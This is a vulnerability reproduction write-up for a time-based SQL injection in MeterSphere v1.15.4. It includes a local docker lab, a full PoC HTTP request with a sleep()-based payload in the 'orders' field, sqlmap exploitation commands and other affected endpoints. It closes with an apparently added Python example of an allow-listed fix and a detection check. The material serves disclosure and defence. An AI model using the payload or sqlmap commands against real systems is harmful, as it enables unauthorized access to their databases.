[Vulnerability Reproduction] CVE-2021-45788 SQL Injection

Published: 2024-12-24 21:47:03

Vulnerability information

NVD - cve-2021-45788

Time-based SQL Injection vulnerabilities were found in Metersphere v1.15.4 via the “orders” parameter.

Authenticated users can control the parameters in the “order by” statement, which causes SQL injection.

API: /test/case/list/{goPage}/{pageSize}

Background

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

Homepage: https://metersphere.io/

Source code: https://github.com/metersphere/metersphere

Environment setup

docker-compose.yml

version: "2.1"
services:
  web:
    image: vulhub/metersphere:1.15.4
    ports:
      - "8081:8081"
      - "5005:5005"
    environment:
      MYSQL_SERVER: db:3306
      MYSQL_DB: metersphere
      MYSQL_USERNAME: root
      MYSQL_PASSWORD: root
      KAFKA_SERVER: kafka:9092
  db:
    image: mysql:5.7
    command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
    environment:
      - MYSQL_ROOT_PASSWORD=root
      - MYSQL_DATABASE=metersphere
  kafka:
    image: bitnami/kafka:3.4.1
    environment:
      # KRaft settings
      - KAFKA_CFG_NODE_ID=0
      - KAFKA_CFG_PROCESS_ROLES=controller,broker
      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
      # Listeners
      - KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
      - KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

Web UI: http://127.0.0.1:8081


Credentials: username admin, password metersphere

Vulnerability reproduction

Reference: [BUG]Time-based SQL Injetion in v1.15.4 · Issue #8651 · metersphere/metersphere

After logging in to the Web UI, go to http://127.0.0.1:8081/#/track/case/all and create a new test case:


POC:

POST /test/case/list/1/10 HTTP/1.1
Host: localhost.lan:8081
Content-Length: 3149
Accept: application/json, text/plain, */*
CSRF-TOKEN: fXx2lJHlPYUA1mmtPn69Bhxtx7UVXEz676ScrXnOlFyUcUPQ0hrM9pjbe4U23MDLdURgu8bAJTZdIdVUYsbaOg==
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1733898529; skinName=skin-blue3; pageNo=1; pageSize=20; MS_SESSION_ID=2aad45b5-a17a-4a02-8e5d-0321805852d0
Connection: close

{"orders":[{"name":"name","type":",if(1=1,sleep(10),sleep(0))"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}

When the if branch executes (sleep(10)), the response is delayed.

When the else branch executes (sleep(0)), the response returns without delay.

This confirms a time-based blind SQL injection; exploitation can then be carried out with sqlmap or a custom brute-force script:

python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user

The same vulnerability is also present in many other endpoints:

/test/plan/case/list/all
/test/plan/case/list/ids
/issues/list/{goPage}/{pageSize}
/test/case/list/{goPage}/{pageSize}

Vulnerability analysis

The source (where the user-controlled orders parameter enters) is in backend/src/main/java/io/metersphere/track/service/TestPlanTestCaseService.java.


The sink (where the order name and type are placed into the “order by” statement of the query) is in backend/src/main/java/io/metersphere/base/mapper/ext/ExtTestPlanTestCaseMapper.xml.

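The root cause described in this analysis, and a defensive check for the affected endpoint list above, as an added example that is not code from this write-up or from the MeterSphere project. It is written in Python rather than the project's Java/MyBatis: build_order_by_vulnerable mirrors the sink pattern (the orders name and type pasted into the SQL text, as a MyBatis ${} substitution does), build_order_by_safe shows the hardened form (column allow-list plus a fixed ASC/DESC map, so no request string reaches the SQL), and is_suspicious_request flags requests to the listed endpoints whose orders entries do not fit that shape. The ALLOWED_COLUMNS set, the SQLite test_case table and its rows, and the sample request bodies are assumptions constructed for the example; the orders entry is the one from the PoC on this page.

```python
import json
import re
import sqlite3

# Constructed sample inputs: the "orders" entry from the PoC above and a benign one.
ATTACK_ORDER = {"name": "name", "type": ",if(1=1,sleep(10),sleep(0))"}
BENIGN_ORDER = {"name": "create_time", "type": "desc"}
ATTACK_BODY = json.dumps({"orders": [ATTACK_ORDER], "filters": {}})
BENIGN_BODY = json.dumps({"orders": [BENIGN_ORDER], "filters": {}})

# The endpoints listed in this write-up as sharing the vulnerable sort handling;
# {goPage}/{pageSize} are numeric path parameters.
AFFECTED_ENDPOINTS = [
    re.compile(r"^/test/plan/case/list/all$"),
    re.compile(r"^/test/plan/case/list/ids$"),
    re.compile(r"^/issues/list/\d+/\d+$"),
    re.compile(r"^/test/case/list/\d+/\d+$"),
]

# Assumed allow-list of sortable columns; the real mapper's column set is not on this page.
ALLOWED_COLUMNS = {"name", "priority", "create_time", "update_time"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by_vulnerable(orders):
    """Root-cause pattern: name and type are pasted into the SQL text, as a
    MyBatis ${} substitution would do, so the caller controls the whole clause."""
    if not orders:
        return ""
    return "ORDER BY " + ", ".join(f"{o['name']} {o['type']}" for o in orders)


def normalize_order(order):
    """Return (column, direction) if the entry is acceptable, else None."""
    if not isinstance(order, dict):
        return None
    name = order.get("name")
    direction = ALLOWED_DIRECTIONS.get(str(order.get("type", "")).strip().lower())
    if name not in ALLOWED_COLUMNS or direction is None:
        return None
    return name, direction


def build_order_by_safe(orders):
    """Hardened form: only allow-listed column names and the literal ASC/DESC
    tokens reach the SQL text; anything else is rejected with ValueError."""
    if not orders:
        return ""
    parts = []
    for o in orders:
        normalized = normalize_order(o)
        if normalized is None:
            raise ValueError(f"rejected order entry: {o!r}")
        parts.append("%s %s" % normalized)
    return "ORDER BY " + ", ".join(parts)


def order_by_is_rejected(orders):
    """True when the hardened builder refuses the given orders list."""
    try:
        build_order_by_safe(orders)
    except ValueError:
        return True
    return False


def is_suspicious_request(path, body):
    """Detection helper for request logs or a WAF rule: flag a request to an
    affected endpoint whose orders[] entries are not an allow-listed column
    plus a plain asc/desc direction."""
    if not any(p.match(path) for p in AFFECTED_ENDPOINTS):
        return False
    try:
        data = json.loads(body)
    except ValueError:
        return False
    orders = data.get("orders") if isinstance(data, dict) else None
    return any(normalize_order(o) is None for o in (orders or []))


def demo_connection():
    """In-memory SQLite table with constructed rows, standing in for test_case."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test_case (id INTEGER, name TEXT, priority TEXT)")
    conn.executemany(
        "INSERT INTO test_case VALUES (?, ?, ?)",
        [(1, "login", "P1"), (2, "checkout", "P0"), (3, "search", "P2")],
    )
    return conn


def query_case_ids(conn, orders):
    """Run the hardened query and return the ids in the resulting order."""
    sql = "SELECT id FROM test_case " + build_order_by_safe(orders)
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    print(build_order_by_vulnerable([ATTACK_ORDER]))   # the injected clause
    print(build_order_by_safe([BENIGN_ORDER]))         # ORDER BY create_time DESC
    print(is_suspicious_request("/test/case/list/1/10", ATTACK_BODY))  # True
```

The fix keeps the mapping from request value to SQL token explicit: direction is looked up in a two-entry dictionary and never echoed back, and column names are compared against a set rather than sanitized, so an entry such as the PoC's type value is rejected outright instead of being partially escaped. The detection helper applies the same shape check to incoming bodies, which is cheaper and more reliable than trying to pattern-match sleep() or other MySQL functions.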


http://www.ppmy.cn/news/1557835.html
